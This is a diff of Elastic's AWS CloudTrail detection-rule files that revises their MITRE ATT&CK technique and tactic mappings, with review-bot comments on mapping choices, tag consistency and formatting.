b/rules/integrations/aws/persistence_iam_user_created_access_keys_for_another_user.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/13" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
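Review bot: The new T1098 block is packed onto the existing T1078 block with no separators: `+reference = "https://attack.mitre.org/techniques/T1078/004/"` is followed directly by `+[[rule.threat.technique]]`, `+reference = "https://attack.mitre.org/techniques/T1098/"` by `+[[rule.threat.technique.subtechnique]]`, and the sub-technique by `[rule.threat.tactic]`, while the same patch inserts a blank line between every other table. Formatting aside, the already-mapped T1484.002 is the sub-technique ATT&CK describes for adding a federated identity provider; if T1098.001 is kept alongside it, a one-line rationale in the rule's description (outside this hunk) would help the next maintainer see why both apply.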
@@ -158,39 +158,21 @@ from logs-aws.cloudtrail-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.001" name = "Additional Cloud Credentials" reference = "https://attack.mitre.org/techniques/T1098/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.001" -name = "Additional Cloud Credentials" -reference = "https://attack.mitre.org/techniques/T1098/001/" - - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_lambda_backdoor_invoke_function_for_any_principal.toml b/rules/integrations/aws/persistence_lambda_backdoor_invoke_function_for_any_principal.toml index 0e89738a87d..cc5eccd43a2 100644 --- a/rules/integrations/aws/persistence_lambda_backdoor_invoke_function_for_any_principal.toml +++ b/rules/integrations/aws/persistence_lambda_backdoor_invoke_function_for_any_principal.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/30" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
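Review bot: The Privilege Escalation `[[rule.threat]]` entry is removed entirely, yet ATT&CK lists T1098.001 under both Persistence and Privilege Escalation, and creating access keys for a more privileged user is a common escalation path, so please confirm the drop is intentional rather than a side effect of de-duplicating the technique. If it stays removed, `Tactic: Privilege Escalation` must also leave the rule's `tags` array (outside this hunk); otherwise the consistency check that flags Tactic tags with no matching threat entry will fail for this rule.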
@@ -113,17 +113,34 @@ info where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" + +[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_rds_db_instance_password_modified.toml b/rules/integrations/aws/persistence_rds_db_instance_password_modified.toml index 941d53cbad3..cf7e2c1b306 100644 --- a/rules/integrations/aws/persistence_rds_db_instance_password_modified.toml +++ b/rules/integrations/aws/persistence_rds_db_instance_password_modified.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/27" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
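Review bot: T1578.005 (Modify Cloud Compute Configurations) is a loose fit for a Lambda resource policy that grants invoke to any principal; as I read ATT&CK, that sub-technique covers account-level compute settings (quotas, regions, tenant-wide policies), whereas an overly permissive resource policy is a permissions change closer to the T1098 family, and the existing T1546 entry already captures the backdoor aspect. Please double-check the intended technique before this mapping propagates to other Lambda rules, and add `Tactic: Defense Evasion` to the `tags` array (outside this hunk) if the entry is kept.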
@@ -136,28 +136,35 @@ info where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.001" name = "Additional Cloud Credentials" reference = "https://attack.mitre.org/techniques/T1098/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" @@ -165,7 +172,6 @@ framework = "MITRE ATT&CK" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_rds_instance_made_public.toml b/rules/integrations/aws/persistence_rds_instance_made_public.toml index cac81e06dff..9ce154caeaa 100644 --- a/rules/integrations/aws/persistence_rds_instance_made_public.toml +++ b/rules/integrations/aws/persistence_rds_instance_made_public.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/29" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
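Review bot: Adding T1098 to the Privilege Escalation entry fixes a tactic that previously carried no technique, but the Defense Evasion entry in the second hunk appears to remain technique-less — its `[[rule.threat]]`/`framework` lines are followed directly by `[rule.threat.tactic]` with nothing in between, inferred from the context lines since the table header is just outside the hunk. A tactic without a technique is a weak mapping; T1556 (Modify Authentication Process), which ATT&CK lists under Defense Evasion, would be a natural candidate for a master-password change, or the entry could be dropped along with its `Tactic: Defense Evasion` tag.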
@@ -144,21 +144,27 @@ any where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" + [[rule.threat.technique.subtechnique]] id = "T1556.009" name = "Conditional Access Policies" reference = "https://attack.mitre.org/techniques/T1556/009/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" @@ -166,7 +172,6 @@ framework = "MITRE ATT&CK" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml b/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml index 7fefa1edaae..c54f9538c96 100644 --- a/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml +++ b/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/10" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] 
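Review bot: The Defense Evasion entry in the second hunk still appears to carry a tactic with no technique — `framework = "MITRE ATT&CK"` leads straight into the `[rule.threat.tactic]` table, as far as the context lines show — while this patch only adds T1133 to the Persistence entry. Either give Defense Evasion a technique (the existing T1556.009 is itself listed under Defense Evasion in ATT&CK) or remove the empty entry together with its `Tactic: Defense Evasion` tag, which lives outside this hunk.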
@@ -127,34 +127,47 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1584" name = "Compromise Infrastructure" reference = "https://attack.mitre.org/techniques/T1584/" + [[rule.threat.technique.subtechnique]] id = "T1584.001" name = "Domains" reference = "https://attack.mitre.org/techniques/T1584/001/" - - [rule.threat.tactic] id = "TA0042" name = "Resource Development" reference = "https://attack.mitre.org/tactics/TA0042/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_route_53_hosted_zone_associated_with_a_vpc.toml b/rules/integrations/aws/persistence_route_53_hosted_zone_associated_with_a_vpc.toml index 6a09be1c590..83355ae7d6e 100644 --- a/rules/integrations/aws/persistence_route_53_hosted_zone_associated_with_a_vpc.toml +++ b/rules/integrations/aws/persistence_route_53_hosted_zone_associated_with_a_vpc.toml @@ -2,7 +2,7 @@ creation_date = "2021/07/19" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Austin Songer", "Elastic"] 
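Review bot: T1562 (Impair Defenses) is added without a sub-technique for disabling a Route 53 domain transfer lock; the lock is a registrar safeguard rather than a security tool or logging pipeline, so, hedging on intent, the existing T1584.001 mapping may already cover this and the new entry deserves a short rationale or a more specific technique. The new block also ends with `+reference = "https://attack.mitre.org/tactics/TA0005/"` immediately followed by `[rule.investigation_fields]`, missing the blank line the patch adds between tables elsewhere.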
@@ -125,34 +125,47 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1583" name = "Acquire Infrastructure" reference = "https://attack.mitre.org/techniques/T1583/" + [[rule.threat.technique.subtechnique]] id = "T1583.001" name = "Domains" reference = "https://attack.mitre.org/techniques/T1583/001/" - - [rule.threat.tactic] id = "TA0042" name = "Resource Development" reference = "https://attack.mitre.org/tactics/TA0042/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1557" +name = "Adversary-in-the-Middle" +reference = "https://attack.mitre.org/techniques/T1557/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_route_table_created.toml b/rules/integrations/aws/persistence_route_table_created.toml index fe48343e5ba..a03d91f91b8 100644 --- a/rules/integrations/aws/persistence_route_table_created.toml +++ b/rules/integrations/aws/persistence_route_table_created.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/05" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] 
@@ -111,6 +111,23 @@ id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" + +[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["cloud.account.id", "user.name"] diff --git a/rules/integrations/aws/persistence_sensitive_operations_via_cloudshell.toml b/rules/integrations/aws/persistence_sensitive_operations_via_cloudshell.toml index 1ada122b033..8a4189fc1cd 100644 --- a/rules/integrations/aws/persistence_sensitive_operations_via_cloudshell.toml +++ b/rules/integrations/aws/persistence_sensitive_operations_via_cloudshell.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/10" integration = ["aws"] maturity = "production" -updated_date = "2026/02/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
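Review bot: `+reference = "https://attack.mitre.org/tactics/TA0005/"` runs directly into `[rule.new_terms]` with no blank line, unlike the table spacing this patch normalizes elsewhere; a single `+` blank line before `[rule.new_terms]` keeps it consistent. `Tactic: Defense Evasion` must also appear in the rule's `tags` array (outside this hunk) for the tag/tactic consistency check.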
@@ -121,39 +121,54 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" + [[rule.threat.technique]] id = "T1136" name = "Create Account" reference = "https://attack.mitre.org/techniques/T1136/" + [[rule.threat.technique.subtechnique]] id = "T1136.003" name = "Cloud Account" reference = "https://attack.mitre.org/techniques/T1136/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_sts_assume_role_with_new_mfa.toml b/rules/integrations/aws/persistence_sts_assume_role_with_new_mfa.toml index fefefd67732..393e9186804 100644 --- a/rules/integrations/aws/persistence_sts_assume_role_with_new_mfa.toml +++ b/rules/integrations/aws/persistence_sts_assume_role_with_new_mfa.toml @@ -2,7 +2,7 @@ creation_date = "2024/10/25" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] 
@@ -106,49 +106,72 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" + [[rule.threat.technique.subtechnique]] id = "T1556.006" name = "Multi-Factor Authentication" reference = "https://attack.mitre.org/techniques/T1556/006/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.001" name = "Application Access Token" reference = "https://attack.mitre.org/techniques/T1550/001/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - [rule.new_terms] field = "new_terms_fields" value = ["user.id", "aws.cloudtrail.flattened.request_parameters.serialNumber"] 
diff --git a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml index 7a16cf870c9..2d378e9d56b 100644 --- a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml +++ b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/31" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -121,39 +121,21 @@ iam where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml index 87734bebf8d..c3021be1173 100644 
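Review bot: With the Persistence `[[rule.threat]]` entry removed, `Tactic: Persistence` has to be dropped from this rule's `tags` array as well, or the consistency check that flags Tactic tags without a matching threat entry will fail; the tags live outside this hunk so I could not confirm. Keeping only Privilege Escalation matches the file name, though ATT&CK lists T1098.003 under Persistence too, so a one-line note on why it was dropped would save the next reviewer the same question — the same applies to the `_to_role` and `_to_user` siblings changed identically below.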
--- a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml +++ b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/31" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -119,39 +119,21 @@ iam where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml index f694877d86f..3f13e220c2a 100644 --- a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml +++ b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml 
@@ -2,7 +2,7 @@ creation_date = "2024/05/30" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -123,39 +123,21 @@ iam where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_iam_customer_managed_policy_attached_to_role.toml b/rules/integrations/aws/privilege_escalation_iam_customer_managed_policy_attached_to_role.toml index 628f3841116..84d8b807eca 100644 --- a/rules/integrations/aws/privilege_escalation_iam_customer_managed_policy_attached_to_role.toml +++ b/rules/integrations/aws/privilege_escalation_iam_customer_managed_policy_attached_to_role.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["aws"] maturity = "production" -updated_date = "2026/01/22" +updated_date = "2026/03/24" min_stack_comments = "New entity classification fields added: entity.target.id" min_stack_version = "9.2.0" 
@@ -100,22 +100,39 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.005" name = "Temporary Elevated Cloud Access" reference = "https://attack.mitre.org/techniques/T1548/005/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_iam_saml_provider_updated.toml b/rules/integrations/aws/privilege_escalation_iam_saml_provider_updated.toml index 4b9ab1316e7..924fb079451 100644 --- a/rules/integrations/aws/privilege_escalation_iam_saml_provider_updated.toml +++ b/rules/integrations/aws/privilege_escalation_iam_saml_provider_updated.toml @@ -2,7 +2,7 @@ creation_date = "2021/09/22" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] 
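Review bot: T1098 Account Manipulation gains a new Persistence `[[rule.threat]]` entry in privilege_escalation_iam_customer_managed_policy_attached_to_role.toml, while the three AdministratorAccess attachment rules earlier in this diff remove their Persistence entry for the same technique (T1098.003). Attaching an IAM policy to a principal is the same persistence-relevant action in all four rules, so the opposite directions read as inconsistent; if the split is deliberate (customer-managed versus AWS-managed policy, or a "one tactic per primary intent" convention), a one-line rationale in the PR description would spare the next reviewer the same question. Whichever direction is kept, the `Tactic:` tag in the rule's `tags` list (outside this hunk) has to follow it.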
@@ -125,22 +125,39 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique.subtechnique]] id = "T1484.002" name = "Trust Modification" reference = "https://attack.mitre.org/techniques/T1484/002/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + +[[rule.threat.technique.subtechnique]] +id = "T1484.002" +name = "Trust Modification" +reference = "https://attack.mitre.org/techniques/T1484/002/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_iam_update_assume_role_policy.toml b/rules/integrations/aws/privilege_escalation_iam_update_assume_role_policy.toml index bc91f308bb7..c8929a7f3ec 100644 --- a/rules/integrations/aws/privilege_escalation_iam_update_assume_role_policy.toml +++ b/rules/integrations/aws/privilege_escalation_iam_update_assume_role_policy.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/06" integration = ["aws"] maturity = "production" -updated_date = "2026/01/22" +updated_date = "2026/03/24" min_stack_comments = "New entity classification fields added: entity.target.id" min_stack_version = "9.2.0" 
@@ -97,22 +97,49 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_role_assumption_by_service.toml b/rules/integrations/aws/privilege_escalation_role_assumption_by_service.toml index c65c86306e6..213f759f65f 100644 --- a/rules/integrations/aws/privilege_escalation_role_assumption_by_service.toml +++ b/rules/integrations/aws/privilege_escalation_role_assumption_by_service.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/17" integration = ["aws"] maturity = "production" -updated_date = "2025/12/16" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] 
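Review bot: The new `[[rule.threat.technique]]` T1098 and `[[rule.threat.technique.subtechnique]]` T1098.003 tables in the first threat entry of privilege_escalation_iam_update_assume_role_policy.toml are added with no `+` blank line before them, whereas every other table this diff touches is normalized to carry one (see the second entry in the same hunk, where each table is preceded by an added blank). Unless the collapsed rendering is hiding a context blank line, add an empty line before `[[rule.threat.technique]]` and before `[[rule.threat.technique.subtechnique]]` so both entries are laid out the same way; TOML does not care, but the repo's formatter will otherwise rewrite it on the next touch. The same missing separator appears for T1548.005 in privilege_escalation_role_assumption_by_service.toml, T1114.002 in collection_graph_email_access_by_unusual_public_client_via_graph.toml, T1562.008 in defense_evasion_kubernetes_events_deleted.toml and defense_evasion_network_watcher_deletion.toml, and T1562.001 in defense_evasion_security_alert_suppression_rule_created.toml.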
@@ -109,34 +109,39 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" +[[rule.threat.technique.subtechnique]] +id = "T1548.005" +name = "Temporary Elevated Cloud Access" +reference = "https://attack.mitre.org/techniques/T1548/005/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.001" name = "Application Access Token" reference = "https://attack.mitre.org/techniques/T1550/001/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_role_assumption_by_user.toml b/rules/integrations/aws/privilege_escalation_role_assumption_by_user.toml index 0abf5a097d8..43e24f0bc86 100644 --- a/rules/integrations/aws/privilege_escalation_role_assumption_by_user.toml +++ b/rules/integrations/aws/privilege_escalation_role_assumption_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/05" integration = ["aws"] maturity = "production" -updated_date = "2026/02/27" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
